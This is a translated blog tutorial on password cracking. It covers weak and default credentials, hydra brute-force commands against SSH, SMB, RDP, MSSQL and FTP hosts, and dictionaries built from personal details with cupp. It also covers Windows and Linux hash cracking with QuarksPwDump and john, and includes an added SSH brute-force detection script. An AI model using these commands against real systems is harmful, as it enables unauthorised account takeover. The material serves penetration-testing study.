Password cracking knowledge summary

Chapter I: Password security threats

Section I: Password security overview

In many places a user name (account) plus a password is the authentication mode, and the password is what grants access. A password is the equivalent of a house key: when someone else holds a key to your home, think about your safety, your finances and your privacy. Examples include web site back ends, databases, servers, PCs, QQ, e-mail and so on.

Section II: Password security situation

Weak passwords
Common weak passwords such as 123456, 654321 and admin123.

Default passwords
Many applications or systems ship with default passwords. For example, the MySQL database bundled with phpstudy has the default credentials [root/root], and the Tomcat management console has the default credentials [tomcat/tomcat].

Plaintext transmission
Services such as HTTP, FTP and TELNET transmit their data streams over the network in plaintext, including the password authentication information. Such services are at risk of being sniffed.

Chapter II: Password cracking

Section I: Online cracking

Cracking accounts that require authentication, in three situations:

User name unknown, password unknown
User name known, password unknown
User name unknown, password known

Using hydra

----
-l	specify a single user name
-p	specify a single password
-P	specify a password dictionary
-L	specify a user-name dictionary
-vV	show the details of each attempt
-o	save the results to a file
-f	stop as soon as a correct password is found
-e	additional checks:
	n	null (try an empty password)
	s	same (try the login name as the password)
	r	reverse (try the reversed login name as the password)
-t	number of parallel tasks (threads)
----

Section II: Offline cracking

The process of turning ciphertext (a captured hash) back into plaintext.

Section III: Brute force

Brute force (暴力破解) takes every possible character combination as a candidate password and tries each one. It is the most primitive and crude cracking method and depends entirely on computing power; if we can bear the time cost, it will eventually crack the password.
The following table shows the size of the password space for different character sets and password lengths.

Character set     Password length   Password space
[0-9]             8                 10^8 = 100000000
[0-9][a-z]        8                 36^8 = 2821109907456
[0-9][a-z]        1-8               ??

[crunch 1 8 abcdefghijklmnopqrstuvwxyz0123456789]

Section IV: Dictionary attack

If we use reasonable conditions to screen or filter out part of the full set of character combinations, the cost of cracking drops significantly.
The screened password combinations are collected into a specific dictionary.
Cracking with a password dictionary is also possible, but doing so may miss the real password.

Password dictionary is broadly divided into the following categories:

  • Weak-password dictionary
    Default or weak passwords such as 123456, admin and the like.

  • Social engineering dictionary
    When people set passwords they often choose something easy to remember, so the password is frequently a combination of personal information, for example the common pattern "name + date of birth".
    [zhangsan1992]
    A social engineering dictionary is more targeted, so its hit rate is relatively high.
    We can generate a password dictionary from a person's information.

    The cupp tool can be used for this,
	but cupp was developed abroad.
------
apt-get update
apt-get install cupp
cupp -i
------
    [zhangsan|ajest|19920701|dnsec|123]
  • Character-set dictionary
    If the character set of the password can be determined, the cost of cracking is greatly reduced.

Section V: Dictionaries in brief

Subdomain dictionary
Default account/password dictionary
File path dictionary
	log files
	web directories
Common variable-name dictionary
Common file-name dictionary
Weak-password dictionary

Chapter III: Windows password cracking

Section I: Remote cracking of Windows passwords

[hydra -l administrator -P ../dic/pwd.dic 172.16.132.163 smb]

Section II: Cracking Windows account hash values

Besides cracking Windows passwords remotely, we can also crack them locally.
Local Windows account cracking has two main approaches.
@ Read the Windows password from memory

We can read the account password directly from the Windows system's memory with getpass.
@ Crack the Windows hash value
hashdump

Cracking Windows hash values takes two steps in total.

First we use the QuarksPwDump tool to read (export) the Windows account password hash values, and then we use the john tool to crack them.

----
john win2k8.hash --format=NT --wordlist=/root/dic/winPass.dic
john win2k8.hash --show --format=NT
----

Chapter IV: Linux password cracking

Linux password cracking can be divided into local cracking and remote cracking.
Remote cracking mainly means brute-forcing the SSH service, which is an online password attack.
Local cracking requires obtaining the Linux shadow file and cracking the hash values in it, which is an offline password attack.

Section I: Cracking the SSH service

We use hydra to attack the SSH service; hydra is already integrated in the Kali virtual machine. The command is as follows:
[hydra -l root -P ../dic/pwd.dic 172.16.132.160 ssh]
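The defender's view of the online attack just described: as an added example that is not part of the original post, this Python snippet parses constructed sshd authentication log lines (host name, addresses and times are made up) and flags any source address that produces a burst of failed logins, noting whether a successful login followed the burst.

```python
import re
from collections import defaultdict
from datetime import datetime
# Constructed sshd log excerpt (made up for this example; host names,
# addresses and times are not from any real system).
SAMPLE_AUTH_LOG = """\
Feb 10 09:12:01 web1 sshd[2201]: Failed password for root from 172.16.132.160 port 40112 ssh2
Feb 10 09:12:02 web1 sshd[2203]: Failed password for root from 172.16.132.160 port 40114 ssh2
Feb 10 09:12:02 web1 sshd[2205]: Failed password for invalid user admin from 172.16.132.160 port 40116 ssh2
Feb 10 09:12:03 web1 sshd[2207]: Failed password for root from 172.16.132.160 port 40118 ssh2
Feb 10 09:12:04 web1 sshd[2209]: Failed password for root from 172.16.132.160 port 40120 ssh2
Feb 10 09:12:05 web1 sshd[2211]: Failed password for root from 172.16.132.160 port 40122 ssh2
Feb 10 09:12:06 web1 sshd[2213]: Accepted password for root from 172.16.132.160 port 40124 ssh2
Feb 10 09:30:00 web1 sshd[2300]: Failed password for alice from 10.0.0.5 port 51000 ssh2
"""
# Matches the standard OpenSSH password/publickey authentication result lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)

def parse_events(log_text, year=2020):
    """Return [(timestamp, source_ip, user, 'Failed'|'Accepted'), ...]."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog lines carry no year, so one is supplied
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["ip"], m["user"], m["result"]))
    return events

def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Map each source IP with >= threshold failures inside any sliding
    window of window_seconds to (peak_failures, success_followed)."""
    by_ip = defaultdict(list)
    for ts, ip, _user, result in sorted(events):
        by_ip[ip].append((ts, result))
    alerts = {}
    for ip, evs in by_ip.items():
        fails = [ts for ts, r in evs if r == "Failed"]
        start = peak = 0
        for end in range(len(fails)):  # sliding window over failure times
            while (fails[end] - fails[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            # a success right after the burst is the case needing immediate attention
            followed = any(r == "Accepted" and ts >= fails[-1] for ts, r in evs)
            alerts[ip] = (peak, followed)
    return alerts
```

A single failed login from 10.0.0.5 stays below the threshold, while the burst from 172.16.132.160 is reported together with the fact that a password login succeeded right after it.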

Section II: Cracking the local shadow file

We can use the john tool to crack the shadow password file.
john is also integrated in Kali. john also needs a dictionary when cracking.
[john shadow]

Chapter V: Network service password cracking

In penetration tests we also carry out password audits of services.

Section I: Cracking MSSQL passwords

For this study a SQL Server 2000 service must be set up first; after starting the Kali virtual machine, enter the following command:

[hydra -l sa -P /root/dic/test_pwd.dic 10.10.20.87  mssql -vV]

Section II: Cracking RDP passwords

[hydra -l administrator -P /root/dic/test_pwd.dic 10.10.20.75 rdp -vV]

Section III: Cracking FTP passwords

[hydra -L /root/dic/test_user.dic -P /root/dic/test_pwd.dic 10.10.20.81 ftp -vV]
Origin blog.csdn.net/qq_41901122/article/details/104245695